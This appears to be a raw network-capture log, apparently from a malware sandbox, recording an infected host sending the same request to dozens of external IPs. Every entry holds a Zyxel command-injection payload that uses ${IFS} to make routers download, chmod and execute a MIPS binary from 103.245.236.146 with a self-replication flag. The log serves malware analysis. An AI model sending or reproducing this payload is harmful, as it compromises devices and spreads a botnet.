                                                        Jan 28, 2024 10:13:00.561284065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6460192.168.2.144002852.133.43.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561307907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6461192.168.2.1459364108.140.69.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561372995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6462192.168.2.1447100161.105.197.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561395884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6463192.168.2.145758220.249.236.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561434031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6464192.168.2.1437890101.134.109.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561467886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6465192.168.2.1460026101.200.155.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561497927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6466192.168.2.144967636.54.215.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561543941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6467192.168.2.143955214.41.16.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561557055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6468192.168.2.1442602175.223.152.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561599016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6469192.168.2.144089074.242.237.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561639071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6470192.168.2.1459370142.229.163.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561671972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6471192.168.2.1435750222.141.217.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561712027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6472192.168.2.1433172121.141.223.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561726093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6473192.168.2.146028038.209.131.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561759949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6474192.168.2.1453682149.209.151.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561795950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6475192.168.2.1451622199.161.189.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561837912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6476192.168.2.1453482199.165.218.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561882019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6477192.168.2.1460664195.131.0.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561918974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6478192.168.2.1441044112.191.250.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561947107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6479192.168.2.1455956205.95.66.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.561979055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6480192.168.2.145566863.84.100.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562026978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6481192.168.2.143873492.180.9.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562062025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6482192.168.2.144303264.64.8.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562089920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6483192.168.2.1444554189.68.105.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562123060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6484192.168.2.1446372170.84.177.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562174082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6485192.168.2.1452274173.250.153.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562218904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6486192.168.2.143867840.36.183.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562242985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6487192.168.2.1453286112.116.128.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562283039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6488192.168.2.1449514165.18.100.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562342882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6489192.168.2.1451220123.234.148.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562377930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6490192.168.2.1456172136.129.163.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562412977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6491192.168.2.1452906109.76.69.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562453985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6492192.168.2.1459790175.119.247.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.562479973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6493192.168.2.1456828210.155.75.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574676991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6494192.168.2.1451744167.157.30.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574712992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6495192.168.2.1445284106.159.178.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574748039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6496192.168.2.1445974131.96.139.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574790955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6497192.168.2.1457828158.61.240.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574819088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6498192.168.2.1442278101.167.183.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574862003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6499192.168.2.1437510102.60.52.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574902058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6500192.168.2.145274070.215.66.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574966908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6501192.168.2.1460396100.190.137.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.574994087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6502192.168.2.143853419.39.90.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575016022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6503192.168.2.1435718183.192.241.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575083017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6504192.168.2.1450098131.39.136.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575109005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6505192.168.2.1441204151.81.60.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575146914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6506192.168.2.1442520165.79.147.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575181961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6507192.168.2.1458660162.188.65.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575216055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6508192.168.2.1436900220.1.119.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575261116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6509192.168.2.143500042.50.167.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575300932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6510192.168.2.146057413.223.89.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575361967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6511192.168.2.1442002163.227.161.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575390100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6512192.168.2.145475878.245.201.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575428963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6513192.168.2.145546667.243.79.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575464010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6514192.168.2.1449830171.133.8.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575499058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6515192.168.2.14566225.214.225.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575548887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6516192.168.2.1435470168.56.50.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575582027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6517192.168.2.1439142172.196.231.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575612068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6518192.168.2.1445138162.69.154.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575661898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6519192.168.2.1452410151.35.60.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.575697899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6520192.168.2.1459792158.156.26.215443
                                                        TimestampBytes transferredDirectionData
